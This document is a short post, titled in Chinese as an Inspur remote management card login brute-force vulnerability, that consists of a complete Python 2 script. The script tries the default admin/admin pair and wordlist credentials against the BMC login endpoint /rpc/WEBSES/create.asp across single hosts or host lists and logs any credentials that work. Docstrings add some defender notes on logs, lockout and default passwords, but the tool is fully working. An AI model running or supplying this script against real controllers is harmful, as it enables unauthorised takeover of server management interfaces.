浪潮远控卡登录爆破漏洞(附爆破脚本)

#!/usr/bin/env python
# -*- coding:utf-8 -*-

#import lib files
import os
import sys
import logging
import requests
from optparse import OptionParser

# Global interpreter and logging configuration.
# Python 2 only: reload(sys) makes setdefaultencoding available again so that
# implicit str/unicode conversions use UTF-8.
reload(sys)
sys.setdefaultencoding("utf-8")
# Timestamped, INFO-level output; every result and error in this script is
# reported through the logging module.
logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)

# Global constants.
# Request headers sent unchanged with every login attempt. The User-Agent is a
# fixed Firefox 57 / macOS string, so in BMC web logs it is a static (and
# trivially altered) indicator rather than a reliable one.
HEADER = {
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
    "Accept":"application/json, text/plain, */*",
    "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding":"gzip, deflate",
    "Content-Type":"application/json;charset=utf-8"
}
# Substring looked for in the response body to recognise an accepted login.
SUCCESS_FLAG = "SESSION_COOKIE"
# Built-in candidates, tried before anything loaded from the word-list files
# (file entries are appended to these lists at run time).
# NOTE(review): presumably admin/admin is the factory credential pair - confirm.
# A controller that still accepts it is matched on the first request, so
# replacing factory credentials is the baseline mitigation.
USERNAME_LIST = ["admin"]
PASSWORD_LIST = ["admin"]

#global functions defines
def config_read_from_file(userfile,pswdfile):
    """Extend the module-level username and password lists from two text files.

    Each file is read one entry per line. Everything from the first line feed
    or carriage return onward is dropped, and the remainder is appended as-is
    (blank lines included) after the built-in defaults.

    A file that cannot be opened or read, including a path of None when the
    option was not supplied, is logged and skipped, so the run continues with
    whatever entries the list already holds.

    Always returns 0.
    """
    global USERNAME_LIST
    global PASSWORD_LIST
    logging.info("[+] Read Configuration From File ...")
    # User names first, then passwords: the same order (and therefore the same
    # log sequence) as handling the two files one after the other.
    for wordlist_path, bucket in ((userfile,USERNAME_LIST),(pswdfile,PASSWORD_LIST)):
        try:
            with open(wordlist_path,"r") as handle:
                for raw in handle.readlines():
                    bucket.append(raw.split("\n")[0].split("\r")[0])
        except Exception as ex:
            logging.error("[-] Configuration Read From File Failed! Reason:%s"%str(ex))
            logging.info("[+] Use Default Dict!")
    return 0

def login_packet_send(target,username,password):
    """Submit one login attempt to the target's web session endpoint.

    Sends a single POST over plain HTTP to /rpc/WEBSES/create.asp carrying the
    WEBVAR_USERNAME / WEBVAR_PASSWORD fields, with the module-level HEADER and
    a 5-second timeout.

    Returns the raw response body on HTTP 200, or -1 on any request error
    (logged) or any other status code.

    Defender note: every attempt is a separate POST to the same path, so a run
    of these requests from one source within a short window is what this
    script looks like in the controller's web log or on the management
    network. Lockout or rate limiting on this endpoint, and keeping the
    interface off routable networks, limit what such a run can achieve.
    """
    form_fields = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}
    try:
        reply = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=form_fields,timeout=5)
    except Exception as ex:
        logging.error("[-] Connect Failed Reason:%s"%str(ex))
        return -1
    if reply.status_code == 200:
        return reply.content
    return -1

def vuln_check(content):
    """Decide whether a login response body indicates an accepted login.

    Despite the name, this does not probe for a vulnerability: it only
    classifies one response. The body counts as a success when it contains
    SUCCESS_FLAG and does not contain the failure marker string.

    Returns 0 for an accepted login, -1 otherwise.
    """
    failure_marker = "Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius"
    accepted = SUCCESS_FLAG in content and failure_marker not in content
    return 0 if accepted else -1

def crack(target,username,password):
    """Try one username/password pair against one target.

    Returns 0 when the response is classified as an accepted login, after
    logging the target together with the working user name and password.
    Returns -1 when the request failed, the status was not 200, or the login
    was rejected.

    Note that the success line writes the password in clear text to the log
    output, so the script's own output has to be handled as sensitive data.
    """
    body = login_packet_send(target,username,password)
    if body == -1:
        return -1
    if vuln_check(body) != 0:
        return -1
    logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))
    return 0

def scan(target,targettype):
    """Run every username/password combination against one or more targets.

    With targettype == 1, `target` is the path of a file listing one host per
    line (line endings and spaces stripped). Any error while reading it is
    swallowed silently and leaves the host list empty. With any other
    targettype, `target` itself is the single host.

    The sweep is strictly sequential: hosts, then user names, then passwords.
    There is no delay between attempts, and it does not stop after a success
    or react to lockout responses. A controller that throttles or locks out
    repeated failures is therefore only ever probed with the first few pairs.

    Returns None; results are reported through logging by crack().
    """
    if targettype == 1:
        hosts = []
        try:
            with open(target,"r") as handle:
                for raw in handle.readlines():
                    hosts.append(raw.split("\n")[0].split("\r")[0].replace(" ",""))
        except Exception:
            pass
    else:
        hosts = [target]
    # The guard tests the raw argument (host or file path), not the host list.
    if len(target) <= 0:
        return
    for host in hosts:
        for candidate_user in USERNAME_LIST:
            for candidate_pswd in PASSWORD_LIST:
                crack(host,candidate_user,candidate_pswd)

#main function -- programme
if __name__ == "__main__":
    # Command-line entry point: register the four options, load the optional
    # word lists, then check either a single host (-t) or a host file (-f).
    # -t takes precedence when both are given; with neither, nothing is sent.
    parser = OptionParser()
    for short_flag, long_flag, dest_name, help_text in (
        ("-t", "--target", "target", "target to check"),
        ("-f", "--filename", "targetfile", "targetfiel to check"),
        ("-u", "--userfile", "userfile", "username dict"),
        ("-p", "--pswdfile", "pswdfile", "password dict"),
    ):
        parser.add_option(short_flag, long_flag, dest=dest_name, help=help_text)
    (options, args) = parser.parse_args()
    config_read_from_file(options.userfile,options.pswdfile)
    # Values treated as "option not supplied".
    unset = ("", None, " ")
    if options.target not in unset:
        scan(options.target,0)
    elif options.targetfile not in unset:
        scan(options.targetfile,1)

 

文 / Aex